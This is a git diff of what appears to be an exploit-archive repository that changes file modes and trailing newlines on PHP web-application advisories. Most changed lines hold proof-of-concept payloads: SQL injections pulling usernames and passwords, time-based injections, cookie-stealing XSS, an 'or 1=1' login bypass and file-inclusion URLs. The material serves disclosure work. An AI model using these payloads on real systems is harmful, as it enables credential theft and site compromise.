+http://www.examplecom/default.php?t=news&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36097.txt b/platforms/php/webapps/36097.txt old mode 100755 new mode 100644 index 112e96b5a..ded061724 --- a/platforms/php/webapps/36097.txt +++ b/platforms/php/webapps/36097.txt @@ -4,4 +4,4 @@ Mambo CMS N-Skyrslur is prone to cross-site scripting vulnerability because it f An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[PATH]/index.php?option=com_n-skyrslur&Itemid=51&do=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_n-skyrslur&Itemid=51&do=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36098.html b/platforms/php/webapps/36098.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36099.html b/platforms/php/webapps/36099.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36102.txt b/platforms/php/webapps/36102.txt old mode 100755 new mode 100644 index 34f6dd7ef..0a410152e --- a/platforms/php/webapps/36102.txt +++ b/platforms/php/webapps/36102.txt @@ -4,4 +4,4 @@ The Mambo CMS N-Gallery component is prone to an SQL-injection vulnerability bec Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_n-gallery&Itemid=-0&flokkur=23 union select 0 from mos_users-- \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_n-gallery&Itemid=-0&flokkur=23 union select 0 from mos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/36103.txt b/platforms/php/webapps/36103.txt old mode 100755 new mode 100644 index bb0c18860..e6a71d3fb --- a/platforms/php/webapps/36103.txt +++ b/platforms/php/webapps/36103.txt @@ -4,4 +4,4 @@ The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users \ No newline at end of file diff --git a/platforms/php/webapps/36106.txt b/platforms/php/webapps/36106.txt old mode 100755 new mode 100644 index eade97a1c..5e339d848 --- a/platforms/php/webapps/36106.txt +++ b/platforms/php/webapps/36106.txt @@ -4,4 +4,4 @@ The Mambo CMS N-Press component is prone to an SQL-injection vulnerability becau Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users \ No newline at end of file diff --git a/platforms/php/webapps/36107.txt b/platforms/php/webapps/36107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36108.txt b/platforms/php/webapps/36108.txt old mode 100755 new mode 100644 index 8b04b5881..e911fe1fd --- a/platforms/php/webapps/36108.txt +++ b/platforms/php/webapps/36108.txt @@ -4,4 +4,4 @@ The Mambo CMS N-Frettir component is prone to an SQL-injection vulnerability bec Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users \ No newline at end of file diff --git a/platforms/php/webapps/36109.txt b/platforms/php/webapps/36109.txt old mode 100755 new mode 100644 index 93a9659fd..af41bfe3b --- a/platforms/php/webapps/36109.txt +++ b/platforms/php/webapps/36109.txt @@ -4,4 +4,4 @@ The Mambo CMS N-Myndir component is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users \ No newline at end of file +http://www.example.com/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users \ No newline at end of file diff --git a/platforms/php/webapps/3611.txt b/platforms/php/webapps/3611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36110.txt b/platforms/php/webapps/36110.txt old mode 100755 new mode 100644 index 3a847a4b5..2aa86dc0f --- a/platforms/php/webapps/36110.txt +++ b/platforms/php/webapps/36110.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary script code in the brows ACal 2.2.6 is vulnerable; other versions may also be affected. -http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36112.txt b/platforms/php/webapps/36112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36113.txt b/platforms/php/webapps/36113.txt old mode 100755 new mode 100644 index 5d76c3abf..f73f9b8b9 --- a/platforms/php/webapps/36113.txt +++ b/platforms/php/webapps/36113.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Advanced Image Hosting Script 2.3 is vulnerable; other versions may also be affected. -http://www.example.com/demo/aihspro/report.php?img_id=[XSS] \ No newline at end of file +http://www.example.com/demo/aihspro/report.php?img_id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36114.txt b/platforms/php/webapps/36114.txt old mode 100755 new mode 100644 index 56f853a97..2f0be69e8 --- a/platforms/php/webapps/36114.txt +++ b/platforms/php/webapps/36114.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 -http://www.example.com/easygallery/index.php?do=<SQL Injection Code>&page=register&PageSection=0 \ No newline at end of file +http://www.example.com/easygallery/index.php?do=<SQL Injection Code>&page=register&PageSection=0 \ No newline at end of file diff --git a/platforms/php/webapps/36117.txt b/platforms/php/webapps/36117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36121.txt b/platforms/php/webapps/36121.txt old mode 100755 new mode 100644 index 717dedaef..e24c82a92 --- a/platforms/php/webapps/36121.txt +++ b/platforms/php/webapps/36121.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Zikula Application Framework 1.3.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?module=theme&type=admin&func=setasdefault&themename=%3Cscript%3Ealert%28docu ment.cookie%29%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?module=theme&type=admin&func=setasdefault&themename=%3Cscript%3Ealert%28docu ment.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36122.txt b/platforms/php/webapps/36122.txt old mode 100755 new mode 100644 index 06ab0e125..2747e7af2 --- a/platforms/php/webapps/36122.txt +++ b/platforms/php/webapps/36122.txt @@ -4,4 +4,4 @@ SkaDate is prone to a cross-site scripting vulnerability because it fails to pro An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/member/blogs.php?tag=blog+[XSS] \ No newline at end of file +http://www.example.com/member/blogs.php?tag=blog+[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36123.txt b/platforms/php/webapps/36123.txt old mode 100755 new mode 100644 index f8cac2dce..80ca73b1e --- a/platforms/php/webapps/36123.txt +++ b/platforms/php/webapps/36123.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc In-link 5.1.3 RC1 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?t=sub_pages&cat=-1+Union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 \ No newline at end of file +http://www.example.com/index.php?t=sub_pages&cat=-1+Union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 \ No newline at end of file diff --git a/platforms/php/webapps/36125.txt b/platforms/php/webapps/36125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36127.txt b/platforms/php/webapps/36127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36129.txt b/platforms/php/webapps/36129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3613.txt b/platforms/php/webapps/3613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36131.txt b/platforms/php/webapps/36131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36135.txt b/platforms/php/webapps/36135.txt old mode 100755 new mode 100644 index bac068e35..cd44d521b --- a/platforms/php/webapps/36135.txt +++ b/platforms/php/webapps/36135.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable. -http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 \ No newline at end of file +http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 \ No newline at end of file diff --git a/platforms/php/webapps/36136.txt b/platforms/php/webapps/36136.txt old mode 100755 new mode 100644 index cf2114e3c..ad4d0c536 --- a/platforms/php/webapps/36136.txt +++ b/platforms/php/webapps/36136.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/index.php?language_file=[LFI]%00 \ No newline at end of file +http://www.example.com/[path]/index.php?language_file=[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/36137.txt b/platforms/php/webapps/36137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3614.txt b/platforms/php/webapps/3614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36140.txt b/platforms/php/webapps/36140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36142.txt b/platforms/php/webapps/36142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36144.txt b/platforms/php/webapps/36144.txt old mode 100755 new mode 100644 index 4b9f52905..08db36bb4 --- a/platforms/php/webapps/36144.txt +++ b/platforms/php/webapps/36144.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?action=[sql inject] http://www.example.com/Card-sharj-scripts/admin/index.php -Username & Password: admin' or '1=1 \ No newline at end of file +Username & Password: admin' or '1=1 \ No newline at end of file diff --git a/platforms/php/webapps/36147.txt b/platforms/php/webapps/36147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36148.txt b/platforms/php/webapps/36148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36149.txt b/platforms/php/webapps/36149.txt old mode 100755 new mode 100644 index 551ebef39..fc5d7ca12 --- a/platforms/php/webapps/36149.txt +++ b/platforms/php/webapps/36149.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a OneCMS 2.6.4 is vulnerable; other versions may also be affected. http://www.example.com/boards.php?t=list&rank=[SQL insertion attacks] -http://www.example.com/index.php?load=list&view=games&abc=[SQL insertion attacks] \ No newline at end of file +http://www.example.com/index.php?load=list&view=games&abc=[SQL insertion attacks] \ No newline at end of file diff --git a/platforms/php/webapps/36150.txt b/platforms/php/webapps/36150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36151.txt b/platforms/php/webapps/36151.txt old mode 100755 new mode 100644 index 2b205cdee..80b99d536 --- a/platforms/php/webapps/36151.txt +++ b/platforms/php/webapps/36151.txt @@ -4,4 +4,4 @@ Zyncro social network is prone to an SQL-injection vulnerability because it fail Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809 \ No newline at end of file +http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809 \ No newline at end of file diff --git a/platforms/php/webapps/36154.txt b/platforms/php/webapps/36154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36155.php b/platforms/php/webapps/36155.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36156.txt b/platforms/php/webapps/36156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36159.txt b/platforms/php/webapps/36159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36160.txt b/platforms/php/webapps/36160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36161.txt b/platforms/php/webapps/36161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36162.txt b/platforms/php/webapps/36162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36163.txt b/platforms/php/webapps/36163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36164.txt b/platforms/php/webapps/36164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36165.txt b/platforms/php/webapps/36165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36166.txt b/platforms/php/webapps/36166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36167.txt b/platforms/php/webapps/36167.txt old mode 100755 new mode 100644 index f3126baf2..f4d49782c --- a/platforms/php/webapps/36167.txt +++ b/platforms/php/webapps/36167.txt @@ -13,4 +13,4 @@ http://www.example.com/AdaptCMS/admin.php?view=/&view=settings http://www.example.com/AdaptCMS/admin.php?view=/&view=users http://www.example.com/AdaptCMS/admin.php?view=/&view=groups http://www.example.com/AdaptCMS/admin.php?view=/&view=levels -http://www.example.com/AdaptCMS/admin.php?view=/&view=stats \ No newline at end of file +http://www.example.com/AdaptCMS/admin.php?view=/&view=stats \ No newline at end of file diff --git a/platforms/php/webapps/36168.txt b/platforms/php/webapps/36168.txt old mode 100755 new mode 100644 index 3c975507d..4adc4e8f9 --- a/platforms/php/webapps/36168.txt +++ b/platforms/php/webapps/36168.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Serendipity Freetag-plugin 3.22; prior versions may also be affected. -http://www.example.com/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=[xss] \ No newline at end of file +http://www.example.com/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36171.txt b/platforms/php/webapps/36171.txt old mode 100755 new mode 100644 index c8d0c70de..1bdbdc411 --- a/platforms/php/webapps/36171.txt +++ b/platforms/php/webapps/36171.txt @@ -4,4 +4,4 @@ The 'com_biitatemplateshop' component for Joomla! is prone to an SQL-injection v Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_biitatemplateshop&groups=[SQLI] \ No newline at end of file +http://www.example.com/index.php?option=com_biitatemplateshop&groups=[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/36173.txt b/platforms/php/webapps/36173.txt old mode 100755 new mode 100644 index 173a914fc..c01d85ec5 --- a/platforms/php/webapps/36173.txt +++ b/platforms/php/webapps/36173.txt @@ -4,4 +4,4 @@ Vanira CMS is prone to an SQL-injection vulnerability because the application fa A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/voteshow.php?vact=ok&vtpidshow=1 [SQL insertion attacks] \ No newline at end of file +http://www.example.com/voteshow.php?vact=ok&vtpidshow=1 [SQL insertion attacks] \ No newline at end of file diff --git a/platforms/php/webapps/36175.txt b/platforms/php/webapps/36175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36176.txt b/platforms/php/webapps/36176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36177.txt b/platforms/php/webapps/36177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36178.txt b/platforms/php/webapps/36178.txt old mode 100755 new mode 100644 index 6d4da9b32..59d0652f1 --- a/platforms/php/webapps/36178.txt +++ b/platforms/php/webapps/36178.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Atahualpa 3.6.8 are vulnerable. -http://www.example.com/?s=%26%23039;%2balert(123)%2b%26%23039; \ No newline at end of file +http://www.example.com/?s=%26%23039;%2balert(123)%2b%26%23039; \ No newline at end of file diff --git a/platforms/php/webapps/36179.txt b/platforms/php/webapps/36179.txt old mode 100755 new mode 100644 index f00372a4d..0a7cd3ade --- a/platforms/php/webapps/36179.txt +++ b/platforms/php/webapps/36179.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Hybrid theme 0.10 are vulnerable. -http://www.example.com/?p=8&cpage=[XSS] \ No newline at end of file +http://www.example.com/?p=8&cpage=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3618.htm b/platforms/php/webapps/3618.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36180.txt b/platforms/php/webapps/36180.txt old mode 100755 new mode 100644 index 260d85a4c..3977f3912 --- a/platforms/php/webapps/36180.txt +++ b/platforms/php/webapps/36180.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to F8 Lite theme 4.2.2 are vulnerable. -http://www.example.com/?p=8&s=[XSS] \ No newline at end of file +http://www.example.com/?p=8&s=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36181.txt b/platforms/php/webapps/36181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36182.txt b/platforms/php/webapps/36182.txt old mode 100755 new mode 100644 index 9864be1c9..e9168e098 --- a/platforms/php/webapps/36182.txt +++ b/platforms/php/webapps/36182.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to EvoLve theme 1.2.6 is vulnerable. -http://www.example.com?s=[xss] \ No newline at end of file +http://www.example.com?s=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36183.txt b/platforms/php/webapps/36183.txt old mode 100755 new mode 100644 index 1e8065e1e..63bf17b2a --- a/platforms/php/webapps/36183.txt +++ b/platforms/php/webapps/36183.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Cover WP theme 1.6.6 are vulnerable. -http://www.example.com/?s=[XSS] \ No newline at end of file +http://www.example.com/?s=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36184.txt b/platforms/php/webapps/36184.txt old mode 100755 new mode 100644 index 9a9a8f8cd..834728a70 --- a/platforms/php/webapps/36184.txt +++ b/platforms/php/webapps/36184.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Web Minimalist theme 1.4 are vulnerable. - http://www.example.com/wp/index.php/[XSS] \ No newline at end of file + http://www.example.com/wp/index.php/[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36185.txt b/platforms/php/webapps/36185.txt old mode 100755 new mode 100644 index 76d8ab6fa..a80683ccf --- a/platforms/php/webapps/36185.txt +++ b/platforms/php/webapps/36185.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Pixiv Custom theme 2.1.5 is vulnerable; prior versions may also be affected. -http://www.example.com/?cpage=[xss] \ No newline at end of file +http://www.example.com/?cpage=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36186.txt b/platforms/php/webapps/36186.txt old mode 100755 new mode 100644 index e1d1cfeb4..b063cc4e5 --- a/platforms/php/webapps/36186.txt +++ b/platforms/php/webapps/36186.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Morning Coffee theme prior to 3.6 are vulnerable. -http://www.example.com/wp/index.php/%22+%3E%3C/form%3E%3CScRiPt%3Exss=53851965%3C/ScRiPt%3E/t \ No newline at end of file +http://www.example.com/wp/index.php/%22+%3E%3C/form%3E%3CScRiPt%3Exss=53851965%3C/ScRiPt%3E/t \ No newline at end of file diff --git a/platforms/php/webapps/36187.txt b/platforms/php/webapps/36187.txt old mode 100755 new mode 100644 index b88d8198d..fad45b1f4 --- a/platforms/php/webapps/36187.txt +++ b/platforms/php/webapps/36187.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Black-LetterHead theme 1.5 is vulnerable; prior versions may also be affected. -http://www.example.com/index.php/%22+%3E%3C/form%3E%3CScRiPt%3Exss=69566599%3C/ScRiPt%3E/t Post Request:s=1& \ No newline at end of file +http://www.example.com/index.php/%22+%3E%3C/form%3E%3CScRiPt%3Exss=69566599%3C/ScRiPt%3E/t Post Request:s=1& \ No newline at end of file diff --git a/platforms/php/webapps/36191.txt b/platforms/php/webapps/36191.txt old mode 100755 new mode 100644 index f42812297..982182d31 --- a/platforms/php/webapps/36191.txt +++ b/platforms/php/webapps/36191.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow RedLine theme prior to 1.66 are vulnerable. -http://www.example.com/?s="%20%3e%3c/link%3e%3cScRiPt%3ealert(123)%3c/ScRiPt%3e \ No newline at end of file +http://www.example.com/?s="%20%3e%3c/link%3e%3cScRiPt%3ealert(123)%3c/ScRiPt%3e \ No newline at end of file diff --git a/platforms/php/webapps/36192.txt b/platforms/php/webapps/36192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36193.txt b/platforms/php/webapps/36193.txt old mode 100755 new mode 100644 index e7f853265..265fd6733 --- a/platforms/php/webapps/36193.txt +++ b/platforms/php/webapps/36193.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc WP Bannerize 2.8.7 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/wp-bannerize/ajax_sorter.phplimit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-bannerize/ajax_sorter.phplimit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) \ No newline at end of file diff --git a/platforms/php/webapps/36194.txt b/platforms/php/webapps/36194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36195.txt b/platforms/php/webapps/36195.txt old mode 100755 new mode 100644 index 5ecbf5e30..80b537733 --- a/platforms/php/webapps/36195.txt +++ b/platforms/php/webapps/36195.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Trending theme 0.2 are vulnerable. -http://www.exmaple.com/?p=8&cpage=[xss] \ No newline at end of file +http://www.exmaple.com/?p=8&cpage=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36196.txt b/platforms/php/webapps/36196.txt old mode 100755 new mode 100644 index d33ac1a6a..ae36554a4 --- a/platforms/php/webapps/36196.txt +++ b/platforms/php/webapps/36196.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Viewpoint 6.0 SP2 is vulnerable; other versions may also be affected. -https://www.example.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3%20order%20by%201,%20%28 select%20case%20when%20%281=1%29%20%20then%201%20else%201*%28select%20table_name%20from%20information_schema.tables%29end%29=1 \ No newline at end of file +https://www.example.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3%20order%20by%201,%20%28 select%20case%20when%20%281=1%29%20%20then%201%20else%201*%28select%20table_name%20from%20information_schema.tables%29end%29=1 \ No newline at end of file diff --git a/platforms/php/webapps/36197.txt b/platforms/php/webapps/36197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36200.txt b/platforms/php/webapps/36200.txt old mode 100755 new mode 100644 index 6f1eb90dd..324f712ad --- a/platforms/php/webapps/36200.txt +++ b/platforms/php/webapps/36200.txt @@ -8,4 +8,4 @@ Netvolution 2.5.8 is vulnerable; other versions may also be affected. The following example input is available: -Referer: 1','0'); [SQL] \ No newline at end of file +Referer: 1','0'); [SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36201.txt b/platforms/php/webapps/36201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36203.txt b/platforms/php/webapps/36203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36204.txt b/platforms/php/webapps/36204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36208.txt b/platforms/php/webapps/36208.txt old mode 100755 new mode 100644 index a6e96e83a..62fd7b67e --- a/platforms/php/webapps/36208.txt +++ b/platforms/php/webapps/36208.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&d http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5-- -http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4-- \ No newline at end of file +http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4-- \ No newline at end of file diff --git a/platforms/php/webapps/36213.txt b/platforms/php/webapps/36213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36214.txt b/platforms/php/webapps/36214.txt old mode 100755 new mode 100644 index 855055c3e..b2493da79 --- a/platforms/php/webapps/36214.txt +++ b/platforms/php/webapps/36214.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to download local files in the context of the BuzzyWall 1.3.2 is vulnerable; other versions may also be affected. -http://www.example.com/resolute.php?img=config.php \ No newline at end of file +http://www.example.com/resolute.php?img=config.php \ No newline at end of file diff --git a/platforms/php/webapps/36215.txt b/platforms/php/webapps/36215.txt old mode 100755 new mode 100644 index e3cb1b7c3..9176bed08 --- a/platforms/php/webapps/36215.txt +++ b/platforms/php/webapps/36215.txt @@ -4,4 +4,4 @@ The 'com_expedition' component for Joomla! is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235' \ No newline at end of file +http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235' \ No newline at end of file diff --git a/platforms/php/webapps/36216.txt b/platforms/php/webapps/36216.txt old mode 100755 new mode 100644 index 2b021ebfb..85ef021f2 --- a/platforms/php/webapps/36216.txt +++ b/platforms/php/webapps/36216.txt @@ -10,4 +10,4 @@ http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI] http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI] -http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI] \ No newline at end of file +http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/3622.php b/platforms/php/webapps/3622.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36220.txt b/platforms/php/webapps/36220.txt old mode 100755 new mode 100644 index 522eb4718..955348980 --- a/platforms/php/webapps/36220.txt +++ b/platforms/php/webapps/36220.txt @@ -4,4 +4,4 @@ The 'com_tree' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2-- \ No newline at end of file +http://www.example.com/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2-- \ No newline at end of file diff --git a/platforms/php/webapps/36221.txt b/platforms/php/webapps/36221.txt old mode 100755 new mode 100644 index 358d1e2df..e35e876b9 --- a/platforms/php/webapps/36221.txt +++ b/platforms/php/webapps/36221.txt @@ -4,4 +4,4 @@ The 'com_br' component for Joomla! is prone to an SQL-injection vulnerability be Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3 \ No newline at end of file +http://www.example.com/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3 \ No 